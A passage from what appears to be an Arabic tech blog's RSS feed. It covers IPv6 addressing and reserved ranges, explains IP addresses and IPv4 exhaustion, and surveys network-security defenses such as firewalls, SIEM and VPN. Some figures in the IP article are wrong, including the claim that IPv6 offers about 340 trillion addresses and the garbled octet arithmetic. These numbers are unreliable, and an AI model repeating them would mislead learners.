&lt;p&gt;هذا الإصدار يسمح باستخدام أكثر من إضافة للترويسات بشكل متسلسل، وكل ترويسة إضافية تحوي حقل Next Header والذي يستخدم لتحديد الترويسة الإضافية التالية، وآخر ترويسة ستشير إلى ترويسة بروتوكول الطبقة الرابعة (مثل TCP).&lt;/p&gt;
&lt;p&gt;الشكل التالي يظهر مثالاً على تسلسل الترويسات الإضافية، أول ترويسة لا تحوي أي إضافات وبالتالي ستشير إلى الحقل الخاص بترويسة TCP، أما في المثال الثالث فيوجد ترويستان إضافيتان: الأولى Routing extension header والثانية Fragmentation extension header والتي سيكون فيها حقل Next Header يشير إلى TCP header.&lt;/p&gt;
&lt;p&gt;&lt;img alt=&quot;ثلاثة أمثلة على تسلسل ترويسات IPv6: ترويسة تشير مباشرة إلى TCP، ثم ترويسة Routing، ثم ترويستا Routing وFragment قبل ترويسة TCP&quot; width=&quot;1600&quot; height=&quot;913&quot; src=&quot;https://blog.cyberpedia.site/_astro/img-03.DY01t0kU_143y02.webp&quot;&gt;&lt;/p&gt;
&lt;h2 id=&quot;addressing-ipv6&quot;&gt;Addressing IPv6&lt;/h2&gt;
&lt;p&gt;أكثر اختلاف ملاحظ بين الإصدارين هو طول العنوان، الإصدار السادس IPv6 له طول 128 bits بينما الإصدار الرابع له طول 32 bits، والسبب هو أن الهدف من الإصدار السادس الحصول على عدد عناوين أكبر، بالإضافة إلى أن الإصدار الرابع يتم تمثيله بالنظام العشري أو الثنائي أما الإصدار السادس فيتم تمثيله بالنظام الست عشري، والعنوان يمثل بمجموعات 16 bits (أربعة أرقام ست عشرية) متبوعة بـ (:) كما في المثال التالي:&lt;/p&gt;
&lt;pre tabindex=&quot;0&quot; data-language=&quot;text&quot;&gt;&lt;code&gt;&lt;span&gt;&lt;span&gt;2340:1111:AAAA:0001:1234:5678:9ABC:1234&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;h3 id=&quot;بعض-الأمور-المستخدمة-لتقليل-التعقيد-الخاص-بهذا-النظام&quot;&gt;بعض الأمور المستخدمة لتقليل التعقيد الخاص بهذا النظام&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;الأصفار في بداية كل مجموعة يمكن حذفها.&lt;/li&gt;
&lt;li&gt;في حال كانت المجموعة تحوي أربعة أصفار يمكن حذفها وكتابة (::)، وهذا الاختصار يمكن أن يحدث لمرة واحدة فقط في العنوان.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;لنفرض أن لدينا العنوان التالي:&lt;/p&gt;
&lt;pre tabindex=&quot;0&quot; data-language=&quot;text&quot;&gt;&lt;code&gt;&lt;span&gt;&lt;span&gt;FE00:0000:0000:0001:0000:0000:0000:0056&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;يمكننا كتابة هذا العنوان على الشكل التالي:&lt;/p&gt;
&lt;pre tabindex=&quot;0&quot; data-language=&quot;text&quot;&gt;&lt;code&gt;&lt;span&gt;&lt;span&gt;FE00:0:0:1:0:0:0:56&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;كما يمكن اختصاره بشكل أكبر كالتالي:&lt;/p&gt;
&lt;pre tabindex=&quot;0&quot; data-language=&quot;text&quot;&gt;&lt;code&gt;&lt;span&gt;&lt;span&gt;FE00:0:0:1::56&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;وكما في الإصدار الرابع يمكننا الإشارة للبادئة الخاصة بالشبكة كما في المثال التالي:&lt;/p&gt;
&lt;pre tabindex=&quot;0&quot; data-language=&quot;text&quot;&gt;&lt;code&gt;&lt;span&gt;&lt;span&gt;2222:1111:0:1:A:B:C:D/64&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;حيث 64 تشير إلى القسم الخاص بتعريف الشبكة، وللحصول على عنوان هذه الشبكة تستبدل باقي الأحرف بعد أول 64 بت بأصفار.&lt;/p&gt;
&lt;p&gt;&lt;img alt=&quot;تقسيم العنوان 2222:1111:0:1:A:B:C:D/64 إلى جزء الشبكة في أول 64 بت وجزء الجهاز في آخر 64 بت، وعنوان الشبكة الناتج 2222:1111:0:1::&quot; width=&quot;1600&quot; height=&quot;913&quot; src=&quot;https://blog.cyberpedia.site/_astro/img-04.CpJi8EhW_Z1ahNaq.webp&quot;&gt;&lt;/p&gt;
&lt;p&gt;يمكن كتابة العنوان السابق بشكل:&lt;/p&gt;
&lt;pre tabindex=&quot;0&quot; data-language=&quot;text&quot;&gt;&lt;code&gt;&lt;span&gt;&lt;span&gt;2222:1111:0:1:0:0:0:0&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;2222:1111:0:1::&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id=&quot;أنواع-العناوين-في-ipv6&quot;&gt;أنواع العناوين في IPv6&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Unicast:&lt;/strong&gt; يستخدم لتعريف interface واحد محدد.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Anycast:&lt;/strong&gt; يستخدم لتعريف مجموعة من interface (عدة عقد)، وعندما يستخدم هذا العنوان فإن حزمة البيانات يتم استلامها من قبل أقرب interface له هذا العنوان.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Multicast:&lt;/strong&gt; يستخدم لتعريف مجموعة من interface، وعندما يستخدم هذا العنوان فإن حزم البيانات يتم تسليمها لكل interface له هذا العنوان.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;وفي هذا النظام من العنونة لا يوجد عنوان broadcast كما في نظام العنونة IPv4، ولإرسال حزمة بيانات بشكل broadcast يتم استخدام multicast address، وفي كل نوع من هذه العناوين يوجد أنواع إضافية أخرى.&lt;/p&gt;
&lt;h2 id=&quot;عناوين-ipv6-الخاصة-والمحجوزة&quot;&gt;عناوين IPv6 الخاصة والمحجوزة&lt;/h2&gt;
&lt;p&gt;بشكل مشابه لنظام العنونة IPv4 يوجد بعض العناوين التي لا يجب استخدامها، والجدول التالي يظهر هذه العناوين:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;العنوان&lt;/th&gt;
&lt;th&gt;الاستخدام&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;::1/128&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Loopback address&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;::/128&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;عنوان غير محدد&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;64:ff9b::/96&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;للترجمة بين IPv4 وIPv6&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;::ffff:0:0/96&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;IPv4 mapped address&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;100::/64&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;تجاهل كتلة العناوين هذه&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;2001::/23&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;مخصص لبروتوكول IETF&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;2001::/32&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;خاص لبروتوكول TEREDO&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;2001:2::/48&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;للمرجعية&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;2001:db8::/32&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;للتوثيق&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;2001:10::/28&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;خاص لـ ORCHID&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;2002::/16&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;تحويل من 6to4&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;Fc00::/7&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Unique-local&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;Fe80::/10&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Linked-scoped unicast&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&quot;تخصيص-عناوين-ipv6&quot;&gt;تخصيص عناوين IPv6&lt;/h2&gt;
&lt;p&gt;الإصدار السادس يدعم عدة طرق لتخصيص العناوين وهي:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Static&lt;/li&gt;
&lt;li&gt;Static prefix with EUI-64&lt;/li&gt;
&lt;li&gt;Stateless address auto configuration (SLAAC)&lt;/li&gt;
&lt;li&gt;Stateful DHCPv6&lt;/li&gt;
&lt;/ul&gt;
</content:encoded><category>الشبكات</category><category>IPv6</category><category>IPv4</category><category>عناوين IP</category><category>بروتوكولات الشبكة</category><category>Neighbor Discovery</category></item><item><title>ما هو عنوان IP</title><link>https://blog.cyberpedia.site/ip/</link><guid isPermaLink="true">https://blog.cyberpedia.site/ip/</guid><description>شرح عنوان IP وصيغتي IPv4 وIPv6، ولماذا نفدت عناوين IPv4، وأبرز مميزات IPv6، وطريقة معرفة عنوان IP الداخلي والخارجي لجهازك على ويندوز.</description><pubDate>Tue, 19 Oct 2021 15:43:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;عنوان IP (Internet Protocol) رقم تعريفي يُعطى لكل جهاز على الشبكة ليميزه ويتيح له التواصل مع باقي الأجهزة. يستخدم IPv4 عناوين بطول 32 بت تكفي لنحو 4.3 مليار عنوان نفدت مع انتشار الإنترنت، فجاء IPv6 بعناوين 128 بت مكتوبة بالنظام الست عشري. تعرف عنوانك الخارجي بالبحث عن what&apos;s my IP، والداخلي على ويندوز بالأمر ipconfig.&lt;/strong&gt;&lt;/p&gt;&lt;h2 id=&quot;ما-هو-عنوان-ip-ip-address&quot;&gt;ما هو عنوان IP (IP address)؟&lt;/h2&gt;
&lt;p&gt;عنوان IP هو اختصار ل Internet Protocol وهو عبارة عن رقم تَعريفي لكل جهاز موجود على الشبكة، حيث يُعطى كلّ جهاز على الشبكة عنواناً يميّزه عن باقي الأجهزة، للسماح له بالتواصل من خلاله مع باقي الأجهزة حيث تظهر معظم عناوين IP بصيغة IPv4 مثل (151.101.65.121) أو بصيغة IPv6 مثل (2001:0db8:85a3:0000:0000:8a2e:0370:7334).&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;الإصدار الرابع (IPv4):&lt;/strong&gt; موجود في معظم أجهزة الحاسوب، ويستخدم هذا الإصدار 32 بت (أرقام ثنائية) لإنشاء عنوان فريد على شبكة الإنترنت، ويتم التعبير عنه من خلال أربعة أرقام تفصلها نقاط، ويمثل كل رقم من الأربعة رقماً عشرياً لثمانية أرقام ثنائية، مثل: (215.21.61.137) وله عدد من المجالات منها الخاص وهو قابل لإعادة الاستخدام ضمن أي شبكة محلية ومنها العام الذي لا يمكن استخدامه لأكثر من جهاز في نفس الوقت&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;الإصدار السادس (IPv6):&lt;/strong&gt; بدأت العديد من أجهزة الحاسوب باستخدامه، حيث يستخدم هذا الإصدار 128 بت لإنشاء عنوان فريد على شبكة الإنترنت، ويتم التعبير عنه من خلال ثماني مجموعات من الأرقام المكتوبة بالنظام الست عشري hexadecimal وتفصلها نقطتان رأسيتان، مثل (2001:cdba:0000:0000:0000:0000:3257:9652)، وفي معظم الأحيان يتم حذف مجموعات الأرقام التي تحتوي على الأصفار بهدف توفير المساحة.&lt;/p&gt;
&lt;h2 id=&quot;ما-هي-مشكلات-ipv4&quot;&gt;ما هي مشكلات IPv4؟&lt;/h2&gt;
&lt;p&gt;يتكون عنوان (ipv4) من 32 بت (Bit) ويقسم على أربع خانات من الأرقام كل خانة تحتوي على رقم من 0 إلى 255 وبالتالي يكون مجموعهم 256 عنوان.&lt;/p&gt;
&lt;p&gt;كل خانة من هذه الخانات تسمى (Octet) وهي ترمز للرقم 8، حيث الخانة الواحدة تحتوي 8 بت (Bit) فالخانة الواحدة تحتوي على أي رقم من 2^1 إلى 2^8&lt;/p&gt;
&lt;p&gt;أي أنّ الشكل الرئيسي لعنوان الآي بي هو التالي : x.x.x.x حيث أن x يتغير من 0 الى 255. وذلك يسمح لنا بإمكان إعطاء عناوين لـ 4.3 مليار شخص تقريبا.&lt;/p&gt;
&lt;p&gt;لكن مع تطور وسائل الاتصال وانتشار ثقافة الإنترنت حول العالم، تزايد أعداد دخول الأشخاص حول العالم بشكل كبير، مما أدى إلى نفاذ تلك العناوين، فكان لا بد من اكتشاف طريقة جديدة تتم العنونة عن طريقها، بحيث تعطينا مساحة أكبر من العناوين مع تزايد المستخدمين الذين يدخلون إلى شبكة الإنترنت يومياً.&lt;/p&gt;
&lt;h2 id=&quot;ما-هو-ipv6&quot;&gt;ما هو IPv6؟&lt;/h2&gt;
&lt;p&gt;هو أحدث إصدارات بروتوكولات العنونة الشبكية، يستخدم الإصدار السابق من بروتوكول الإنترنت IPV4 عنوان مكون من 32 Bit لدعم ما يزيد عن 4.3 مليار جهاز لكن مع انتشار الإنترنت وتطوّره وتزايد عدد المستخدمين وأجهزة الحواسيب والهواتف المحمولة أصبحت الحاجة إلى المزيد من العناوين ملحة جداً، IPv6 يستخدم ثماني مجموعة كل منها مكوّنة من أربعة أرقام ست عشرية مما يتيح عدد أكبر من العناوين.&lt;/p&gt;
&lt;h3 id=&quot;مميزات-ipv6&quot;&gt;مميزات IPv6&lt;/h3&gt;
&lt;p&gt;يحتوي هذا الإصدار على تحسينات جديدة مقارنة بالإصدار الرابع (IPV4)، إذ يمكن لبروتوكول الإصدار السادس (IPV6) معالجة الحزم بشكل أكثر كفاءة. بالإضافة إلى إدخال مجموعة من التحسينات لزيادة الأداء والأمان.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;تضمن هذا الإصدار مجموعة هامة من الميزات منها:&lt;/strong&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;استخدام حقل (Flow Label) لتحديد تدفق الحزمة لدعم خاصية (QoS) في أجهزة الراوتر، ممَّا يسرّع التعامل مع جدول التوجيه.&lt;/li&gt;
&lt;li&gt;يدعم حجم الحزمة 1280 بايت (دون تجزئة).&lt;/li&gt;
&lt;li&gt;لا يحتوي على الملفات الاختبارية الموجودة في الإصدار السابق.&lt;/li&gt;
&lt;li&gt;يدعم بروتوكول (IPSec) مما يزيد الأمان في الشبكة.&lt;/li&gt;
&lt;/ol&gt;
&lt;h2 id=&quot;الفرق-بين-ipv4-وipv6&quot;&gt;الفرق بين IPv4 وIPv6&lt;/h2&gt;
&lt;p&gt;يشترك كل من البروتوكولين بخصائص وبنية متشابهة كما أنّ (IPV6) يعتبر بديلاً ل (IPV4). لكن الفرق الأبرز والأوضح يكمن في أنه يتم تمثيل (IPV4) بواسطة أرقام مؤلفة من 32 بت (Bit)، ما يترجم إلى عدد يصل حتى 4.3 مليار من العناوين، بينما يتم تمثيل (IPV6) بواسطة 128 بت أي ما يعادل 340 تريليون عنوان.&lt;/p&gt;
&lt;h2 id=&quot;طريقة-العثور-على-عنوان-ip-الداخلي-والخارجي&quot;&gt;طريقة العثور على عنوان IP الداخلي والخارجي&lt;/h2&gt;
&lt;p&gt;يتم العثور على عنوان IP الخارجي من خلال البحث ضمن محرك البحث غوغل عن “what’s my IP”، نتيجة البحث تظهر عنوان IP الخارجي في صفحة النتائج.&lt;/p&gt;
&lt;p&gt;يتم العثور على عنوان IP الداخلي لأجهزة نظام ويندوز من خلال فتح سطر الأوامر cmd ثم كتابة التعليمة التالية:&lt;/p&gt;
&lt;pre tabindex=&quot;0&quot; data-language=&quot;bat&quot;&gt;&lt;code&gt;&lt;span&gt;&lt;span&gt;ipconfig&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;عندها ستظهر مجموعة من المعلومات، من ضمنها عنوان IP حيث يعبر هذا العنوان عن IP داخلي.&lt;/p&gt;
</content:encoded><category>الشبكات</category><category>عنوان IP</category><category>IPv4</category><category>IPv6</category><category>الشبكات</category></item><item><title>أمن الشبكات Network Security</title><link>https://blog.cyberpedia.site/network-security/</link><guid isPermaLink="true">https://blog.cyberpedia.site/network-security/</guid><description>ما هو أمن الشبكات ومراحله الثلاث: الحماية والاكتشاف والاستجابة، و14 تقنية لتطبيق الدفاع في العمق من الجدار الناري إلى SIEM، والمهارات المطلوبة.</description><pubDate>Sun, 18 Jul 2021 08:07:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;أمن الشبكات هو اتخاذ تدابير وقائية مادية وبرمجية لحماية البنية التحتية للشبكة من الوصول غير المصرح به وسوء الاستخدام والتلاعب بالبيانات أو تدميرها. يقوم على ثلاث مراحل: الحماية والاكتشاف والاستجابة، ويُطبَّق باستراتيجية الدفاع في العمق عبر طبقات مثل الجدران النارية وأمن البريد ومضادات الفيروسات وتقسيم الشبكة والتحكم بالوصول وIPS وSIEM وVPN.&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;إذا كنت اخصائي أمن معلومات فإن مهمتك الأساسية هي الحفاظ على أمان الشبكة عند المستوى الأمثل من خلال نشر وإعداد أدوات الحماية المناسبة لضمان مراقبة كل أنظمة المعلومات الخاصة بشركتك وتقيمها من الناحية الأمنية بشكل دائم والدفاع عنها بقوة أو إذا كنت اخصائي شبكات يجب أن تكون على دراية جيدة ليس فقط بتقنيات الشبكات ولكن بطرق الحماية الخاصة بها أيضاً ،أمن الشبكات أمر بالغ الأهمية، في هذا المقال سوف نناقش الأمور والمحاور الأساسية الخاصة بأمن وحماية الشبكات.&lt;/p&gt;
&lt;h2 id=&quot;ما-هو-أمن-الشبكات-network-security&quot;&gt;ما هو أمن الشبكات Network Security؟&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;أمن الشبكة:&lt;/strong&gt; هو عملية اتخاذ تدابير وقائية مادية وبرمجية لحماية البنية التحتية للشبكة من الوصول الغير مصرح به أو سوء الاستخدام أو الأعطال أو التعديل أو التلاعب أو تدمير البيانات وبالتالي هي انشاء نظام آمن يطبق على كل من أجهزة الحاسب وأجهزة الشبكة والبرامج والمستخدمين للحصول على أداء فعال ضمن بيئة آمنة، أمن الشبكة هو أي نشاط هدفه حماية وسلامة الشبكة والبيانات والمعلومات ويشمل كل من:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;الأجهزة والبرامج Hardware and Software&lt;/li&gt;
&lt;li&gt;الدفاع ضد جميع أنواع التهديدات threats&lt;/li&gt;
&lt;li&gt;منع الوصول الغير مصرح به للشبكة وإدارة عملية الوصول لجميع المصادر.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;أمن الشبكة يجمع بين عدد من طبقات الحماية على أطراف الشبكة وداخلها وكل طبقة حماية تقوم بتطبيق سياسات وضوابط معينة يحصل من خلالها المستخدمون المصرح لهم بحق الوصول لمصادر الشبكة ويتم حظر الجهات الخبيثة ومنعها من تنفيذ عمليات التهديد أو الاستغلال.&lt;/p&gt;
&lt;p&gt;على كل منظمة ترغب بتقديم الخدمات التي يطلبها العملاء أن تقوم بحماية شبكتها بشكل مناسب لتتم كل العمليات بشكل آمن، وبشكل عام يوجد ثلاث مراحل أساسية لتطبيق أمن الشبكة وهذه المراحل يجب أن تكون هي الإطار الأساسي لاستراتيجية عملك.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;بشكل عملي فإن أمن الشبكة يتم من خلال الأمور التالية:&lt;/strong&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;الحماية:&lt;/strong&gt; يجب أن تقوم بإعداد وضبط الأنظمة والأجهزة بشكل صحيح قدر الإمكان.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;الاكتشاف:&lt;/strong&gt; يجب أن تكون قادر على تحديد أو اكتشاف أي تغيير في الضبط أو الاعدادات أو أي مشكلة أو نشاط غير اعتيادي ضمن حركة البيانات عبر الشبكة.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;الاستجابة:&lt;/strong&gt; بعد تحديد المشكلة يجب أن تتم عملية الاستجابة والمعالجة لها لتعود الأمور إلى الحالة الآمنة بأسرع وقت ممكن.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;أمن الشبكة يجب أن يتم من خلال استراتيجية الدفاع في العمق defense in depth (سنقوم بشرحها في مقال قادم) إذا كان هناك أمر واحد متفق عليه بين كل خبراء أمن المعلومات فهو أن الاعتماد على خط دفاع واحد هو أمر خطير جداً لأن أي أداة دفاعية واحدة يمكن هزيمتها من قبل خصم مصمم.&lt;/p&gt;
&lt;h2 id=&quot;كيف-يمكنك-تطبيق-أمن-الشبكة&quot;&gt;كيف يمكنك تطبيق أمن الشبكة؟&lt;/h2&gt;
&lt;p&gt;لتطبيق استراتيجية الدفاع في العمق ستحتاج لتطبيق مجموعة متنوعة من الطرق والتقنيات المخصصة وهي:&lt;/p&gt;
&lt;h3 id=&quot;1-الجدران-النارية-firewalls&quot;&gt;1. الجدران النارية Firewalls&lt;/h3&gt;
&lt;p&gt;تشكل حاجز بين شبكتك الداخلية الموثوقة والشبكات الخارجية الغير موثوقة (شبكة الانترنت) ويتم ذلك من خلال تطبيق مجموعة من القواعد المحددة التي تسمح أو تمنع حركة البيانات، الجدار الناري يمكن ان يكون عبارة عن جهاز او برنامج أو كليهما تقدم العديد من الشركات أجهزة إدارة التهديدات الموحدة UTM أو جدران نارية من الجيل الجديد next-generation firewalls التي تركز على منع التهديدات.&lt;/p&gt;
&lt;h3 id=&quot;2-أمن-البريد-الالكتروني&quot;&gt;2. أمن البريد الالكتروني&lt;/h3&gt;
&lt;p&gt;البريد الالكتروني يعتبر ناقل التهديدات الأخطر حيث يقوم المهاجم باستخدام أساليب الهندسة الاجتماعية للقيام بهجمات التصيد الالكتروني لخداع المستخدمين وارسالهم لمواقع مزورة تقدم برمجيات خبيثة، تطبيق أمن البريد الالكتروني يحظر الهجمات الالكترونية الواردة عبر البريد الالكتروني ويتحكم بالرسائل الواردة ويمنع تسريب البيانات الحساسة.&lt;/p&gt;
&lt;h3 id=&quot;3-مضاد-الفيروسات-anti-virus&quot;&gt;3. مضاد الفيروسات Anti Virus&lt;/h3&gt;
&lt;p&gt;يعمل على كشف ومنع البرمجيات الخبيثة Malware وهي اختصار ل Malicious Software (برمجية خبيثة) وتشمل كل من الفيروسات والديدان وأحصنة طروادة وبرامج الفدية وبرامج التجسس، في بعض الأحيان يتم إصابة الشبكة بنوع معين من البرمجيات الخبيثة ولكنها تبقى كامنة لأيام أو أسابيع قبل أن تبدأ عملها لذلك فإن مضاد الفيروسات الفعال يجب أن يكون قادر على تتبع الملفات باستمرار وليس فقط لحظة دخولها للشبكة وذلك للعثور على الحالات الشاذة أو النشاط الخبيث والقيام بإزالة هذه البرامج الضارة وإصلاح الضرر.&lt;/p&gt;
&lt;h3 id=&quot;4-تقسيم-الشبكة-network-segmentation&quot;&gt;4. تقسيم الشبكة Network Segmentation&lt;/h3&gt;
&lt;p&gt;تقسيم الشبكة يسمح بوضع حركة البيانات ضمن تصنيفات مختلفة وهذا يسمح بتطبيق سياسات الأمان بشكل أفضل، تعتمد هذه التصنيفات على هوية النقطة النهائية أو المستخدم ويمكن تعيين حقوق الوصول بناء على الدور أو الموقع أو أمور أخرى بحيث يتم منح المستوى الصحيح من الوصول للأشخاص المناسبين ويتم احتواء الأجهزة المشبوهة ومعالجتها.&lt;/p&gt;
&lt;h3 id=&quot;5-التحكم-بالوصول-access-control&quot;&gt;5. التحكم بالوصول Access Control&lt;/h3&gt;
&lt;p&gt;لا يجب أن يملك كل مستخدم حق الوصول إلى كامل موارد الشبكة، لمنع الهجمات نحتاج للتعرف على كل مستخدم وكل جهاز ومن ثم يمكن فرض سياسات الأمان الخاصة وحظر الأجهزة الغير متوافقة أو منحها وصول محدود فقط هذه العملية تسمى التحكم بالوصول للشبكة NAC – Network Access Control&lt;/p&gt;
&lt;h3 id=&quot;6-أمن-التطبيقات-application-security&quot;&gt;6. أمن التطبيقات Application Security&lt;/h3&gt;
&lt;p&gt;أي برنامج تقوم باستخدامه للقيام بعملك يجب أن يكون آمن سواء قام فريق خاص لديك بتطويره او قمت بشرائه، قد يحوي التطبيق على ثغرات أو نقاط ضعف تسمح للمهاجمين باستغلالها للوصول للشبكة ويشمل أمن التطبيقات كل من الأجهزة والبرامج والعمليات الخاصة بها.&lt;/p&gt;
&lt;h3 id=&quot;7-تحليل-السلوك-behavior-analysis&quot;&gt;7. تحليل السلوك Behavior Analysis&lt;/h3&gt;
&lt;p&gt;لاكتشاف السلوك المشبوه يجب أولاً أن نعرف ما هو السلوك الطبيعي، أدوات تحليل السلوك تميز تلقائياً الأنشطة التي تخرج عن القاعدة وهذا يسمح لفريق الحماية بتحديد مؤشرات الاختراق التي تطرح مشكلة محتملة لمعالجة التهديدات بأسرع وقت ممكن.&lt;/p&gt;
&lt;h3 id=&quot;8-تقنيات-منع-فقدان-البيانات-data-loss-prevention&quot;&gt;8. تقنيات منع فقدان البيانات Data Loss Prevention&lt;/h3&gt;
&lt;p&gt;يجب على المنظمات التأكد من أن موظفيها لا يرسلون معلومات حساسة خارج الشبكة، يمكن لتقنيات منع فقدان البيانات DLP أن تمنع الأشخاص من رفع أو تحميل المعلومات المهمة أو إعادة توجيهها أو حتى طباعتها بشكل غير آمن.&lt;/p&gt;
&lt;h3 id=&quot;9-أنظمة-منع-الاختراق-ips--intrusion-prevention-system&quot;&gt;9. أنظمة منع الاختراق IPS – Intrusion Prevention System&lt;/h3&gt;
&lt;p&gt;يقوم نظام منع الاختراق IPS بفحص حركة البيانات عبر الشبكة لمنع الهجمات بشكل فعال وحظر النشاط الضار.&lt;/p&gt;
&lt;h3 id=&quot;10-أمن-أجهزة-الموبايل&quot;&gt;10. أمن أجهزة الموبايل&lt;/h3&gt;
&lt;p&gt;يستهدف المهاجمون بشكل متزايد الأجهزة المحمولة والتطبيقات الخاصة بها بالطبع أنت بحاجة إلى التحكم بالأجهزة المحمولة التي يمكنها الوصول إلى الشبكة وبحاجة لتقوم بضبط وإعداد اتصالاتهم للحفاظ على أمان حركة البيانات عبر الشبكة.&lt;/p&gt;
&lt;h3 id=&quot;11-أنظمة-إدارة-المعلومات-والأحداث-الأمنية-siem&quot;&gt;11. أنظمة إدارة المعلومات والأحداث الأمنية SIEM&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;SIEM – Security Information and Event Management&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;عبارة عن نظام مركزي يتم فيه تجميع الأحداث والتنبيهات الأمنية من مختلف الأجهزة والأنظمة والتقنيات الموجودة ضمن البنية التحتية الخاصة بالشبكة وذلك لمراقبتها وتحليلها ضمن مكان واحد الأمر الذي يسهل عملية مراقبة الشبكة بكل ما فيها من أجهزة وأنظمة واكتشاف أي أعمال مشبوهة قد تحدث داخلها وربط السجلات من أكثر من جهاز وتقنية مع بعضها البعض لتحديد الهجمات المحتملة والاستجابة لها.&lt;/p&gt;
&lt;h3 id=&quot;12-الشبكات-الخاصة-الافتراضية-vpn&quot;&gt;12. الشبكات الخاصة الافتراضية VPN&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;VPN – Virtual Private Network&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;تسمح لجهازين متصلين عبر شبكة عامة مثل الانترنت بتبادل البيانات الخاصة مع بعضهم البعض عبر قناة اتصال مشفرة وقد يتواجد الجهازين في شبكة محلية أو عبر شبكة متباعدة باختصار فإن الشبكة الخاصة الافتراضية هي اتصال شبكي خاص يتم عبر شبكة عامة ضمن قناة اتصال مشفرة كما انها تسمح بإنشاء اتصال مشفر بين مجموعة من المستخدمين مفصولين عن بقية مستخدمي الشبكة وتسمح بتقديم مجموعة من الوظائف أو الخدمات ومن الممكن تطبيقها باستعمال تقنيات ومعايير مختلفة وتستخدم تقنيات تشفير مختلفة بالإضافة لتقنيات متنوعة للتحقق من الهوية.&lt;/p&gt;
&lt;h3 id=&quot;13-أمن-الويب&quot;&gt;13. أمن الويب&lt;/h3&gt;
&lt;p&gt;حلول وتقنيات حماية تطبيقات الويب تؤمن حل آمن لاستخدام الويب وتمنع التهديدات والوصول الي المواقع الضارة وتحمي تطبيقات الويب وتطبيقات الحوسبة السحابية من الهجمات المحتملة وهذا المصطلح يشير أيضاً إلى الخطوات المتخذة لحماية موقع الويب الخاص بالشركة.&lt;/p&gt;
&lt;h3 id=&quot;14-أمن-الشبكات-اللاسلكية&quot;&gt;14. أمن الشبكات اللاسلكية&lt;/h3&gt;
&lt;p&gt;الشبكات اللاسلكية ليست آمنة مثل الشبكات السلكية وبدون اتخاذ إجراءات أمنية صارمة ستكون المعلومات المتبادلة عبر الشبكات اللاسلكية غير آمنة ،سنتحدث في مقال قادم عن التقنيات والتجهيزات المستخدم لحماية الشبكات اللاسلكية بشكل مفصل.&lt;/p&gt;
